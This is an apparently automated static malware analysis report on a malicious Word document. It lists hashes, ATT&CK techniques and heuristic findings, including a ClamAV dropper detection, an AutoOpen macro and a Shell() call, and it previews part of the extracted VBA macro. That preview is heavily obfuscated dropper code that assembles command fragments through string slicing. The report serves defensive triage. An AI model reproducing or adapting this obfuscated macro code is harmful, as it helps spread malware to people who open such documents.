Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f04475ef220a3054…

MALICIOUS

Office (OLE)

Size: 211.0 KB
Created: 2018-02-27 14:26:00
Authoring application: Microsoft Office Word
First seen: 2018-09-04
MD5: f40a9b36e3959928aa10437b1ffb9b4a
SHA-1: f8a44db8be4adc0d2d7921dabaaacb8835addd19
SHA-256: f04475ef220a30546e1f7f5628c3059a3a0fbcc968e5992f79a8edb12d9c7096
Risk score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro includes a Shell() call, indicating an attempt to execute arbitrary code. This is further supported by ClamAV detection as a dropper agent. The macro's obfuscated nature and the presence of a 'macros.bas' artifact suggest it's designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6458289-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458289-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 62600 bytes
SHA-256: 193c0e6904a06b990aa5396741339648934c353acd689aeffa84b7210cb5de7a
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UNOwYMEWlDIij"
Sub ZKSdasjlul()
   On Error Resume Next
   Do While KZdBEZwoXp Xor jCiFzShUWziL
      Dim uRisHLjScTO
      Do While aVjiLtLkkdQw Or sODaPibOw
         nvDjMF = 6025 - Atn(EjQRZzAqK / CByte(7) + XauRB + Hex(WPzfsNonZbO)) + (171376742 / jHMzfOYjhETQD) * (5938624 * ChrW(520437311) + EaEoDqmPjRO * iqudszjHHC)
      Loop
      XvjsUzSvjcIJO = 6025 - Atn(lYXHTbukEji / CByte(7) + ELVhwcBjjsWz + Hex(RNWhzWhj)) + (171376742 / HZLAnbwmqzJht) * (5938624 * ChrW(520437311) + awjfHi * sBaoC)
      Do
         YCHNAGK = vWvpa * CDate(426718607 * Atn(tCZnkYGwjRrZ - Fix(rOYlL * CDate(8832))) * OYjjjJbiCick / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(hsIpbmEiGcTp) / bFSpXlkEL - ChrB(872) / JTqiJpE + Chr(778 / Atn(48 * Round(GhBsJiZw / CBool(2)))) / (1199 / CByte(HGIwQtNhVPMHrz * 8 + VdzWlHuoCKNI * CDbl(39)))
      Loop Until iwkQamdw <= StZdw
      arKPhRXfjCLr = RGlClsz + fwjEVlRLF
   Loop
   Set IKGOKzzaDLQANO = RhzjqokzNuudLL
End Sub
Function VSBjSihFbzlvMm()
On Error Resume Next
vOzMrzGkwKf = "rwl%kwcUCbwZwmLdoMCtQvktfLYzFC"
JUKLRrMjVv = hmlibKIJOCJ = 6025 - Atn(TaIAUPpUCjQti / CByte(7) + TjcvGGb + Hex(LCrDpm)) + (171376742 / tqCqikAFwUrR) * (5938624 * ChrW(520437311) + dBWsANq * jTvDQKPFIQ)
FlitvZiUiv = DfJqNCviSb = 6025 - Atn(aPoMfJjzDc / CByte(7) + MNWHmRZkzpERNj + Hex(LIqEiYBC)) + (171376742 / jODiFZJMzITvT) * (5938624 * ChrW(520437311) + PiFhbo * zbdLwXIzt)
AXhKo = iuivbdfghnkjgyugjn(vOzMrzGkwKf, 26, 2)
zWLvnbXHSh = "EkwOJjHjKTisJXtucZzYlU !%6rav%!!%5raqq"
jtJObcGoY = JSnZFrERNfz = 6025 - Atn(SnnEXohnHdj / CByte(7) + aiANCFAFzz + Hex(ztKrQnSZ)) + (171376742 / YuLqdPjwUjafjI) * (5938624 * ChrW(520437311) + bqrPHfufTXpKNw * zpEoGjSJ)
hnuXMTWFpvw = mVBlQYkOlLQ = 6025 - Atn(wCRPdOsSn / CByte(7) + WCCkl + Hex(uBSIhGcmdJ)) + (171376742 / unbZCfr) * (5938624 * ChrW(520437311) + mmYcS * qwizzijnJ)
QSHQvFsL = iuivbdfghnkjgyugjn(zWLvnbXHSh, 3, 14)
ijOSOLiB = "LSYmIMJCkZLQadQjXUwoUUioLWRiG"
zbZUOji = tPrCEp = 6025 - Atn(wLUmijQ / CByte(7) + IjZrIADkSJK + Hex(QzwjjOiODj)) + (171376742 / fNUfLd) * (5938624 * ChrW(520437311) + mNuKQ * FokHpiZs)
wXVBqM = KtwNnFTFCdYYu = 6025 - Atn(nUrHQWwkFi / CByte(7) + bsiWYYJPlC + Hex(jwpvTIshsw)) + (171376742 / LwnwXJW) * (5938624 * ChrW(520437311) + aoQjMNojdEPIJa * osRUDor)
iERWtRlYDU = iuivbdfghnkjgyugjn(ijOSOLiB, 14, 8)
ChQTHCJbP = "VMLoGoiwll=%6rav% tesRVlzRKYonvWuj"
LmsSH = ZYLYO = 6025 - Atn(fmGacSCts / CByte(7) + SNIikE + Hex(hJDorEEi)) + (171376742 / GkzrRYzU) * (5938624 * ChrW(520437311) + JuJtbIhlnEb * wQUId)
AQfGjj = KkoiBrM = 6025 - Atn(RuBouOn / CByte(7) + bKGohuHFQAHKHU + Hex(inIoktbsRj)) + (171376742 / qmjzJNR) * (5938624 * ChrW(520437311) + pJBohPciRBkBEz * SAlZDFzS)
FmduRN = iuivbdfghnkjgyugjn(ChQTHCJbP, 14, 13)
GXKhhnVAPf = "MQrVv%!!%4rav%!!%3rav%UzojiFhSEcYjb"
VNBZw = ajwOnTwzQE = 6025 - Atn(IBHIj / CByte(7) + ldjiSQjwnuvhu + Hex(GskZYTER)) + (171376742 / QoNQODM) * (5938624 * ChrW(520437311) + qZpDtivHPOPAZ * SVlzP)
NwTUpjpnZzU = ijQnURQp = 6025 - Atn(zVubBE / CByte(7) + FPNKoR + Hex(EoRmMV)) + (171376742 / fRnvKGICjbRFC) * (5938624 * ChrW(520437311) + tVYXwKQW * FcQbMwCfDUN)
swkZBvm = iuivbdfghnkjgyugjn(GXKhhnVAPf, 14, 18)
tcQjV = "YijkZrav% tOYQJll"
QZuskO = rwvZYjYcBk = 6025 - Atn(qiihIPsJ / CByte(7) + vamiaHiaJZt + Hex(CnGWHZZIHVYM)) + (171376742 / OVwjr) * (5938624 * ChrW(520437311) + ZZpiRJQzQzzTcq * orcKBpTAZaB)
zjtQTDrl = bLlktSbUNM = 6025 - Atn(pMqaIL / CByte(7) + BwWXZi + Hex(WpIGYPEPj)) + (171376742 / nfNDABWRbjnw) * (5938624 * ChrW(520437311) + OKpQYFE * lHNXc)
wbfbz = iuivbdfghnkjgyugjn(tcQjV, 7, 6)
CVrkrXbz = "wKWnvZamsUo% teQDIc"
jzBMOil = NLVjbKpWfHzW = 6025 - Atn(parluwLUTwHwa / CByte(7) + EMKOPW + Hex(YvdtABCGoHY)) + (171376742 / fcnBCOBPQuO) * (5938624 * ChrW(520437311) + jAFlKVt * ALRfNrtzIOf)
CzLzDk
... (truncated)